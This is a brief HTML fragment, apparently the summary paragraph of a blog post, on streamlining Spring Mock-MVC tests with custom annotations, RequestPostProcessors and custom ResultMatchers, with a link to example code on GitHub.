<p>We can use custom test annotations to standardize our Spring Mock-MVC test setup. With small shortcut methods and <span class="code">RequestPostProcessor</span>s we can move reusable request code out of test methods. Custom <span class="code">ResultMatcher</span>s can be used to improve response checks.</p>
<p>You can find the example code on <a href="https://github.com/mscharhag/blog-examples/tree/master/mockmvc-testing" target="_blank">GitHub</a>.</p>2020-11-02T11:25:57Z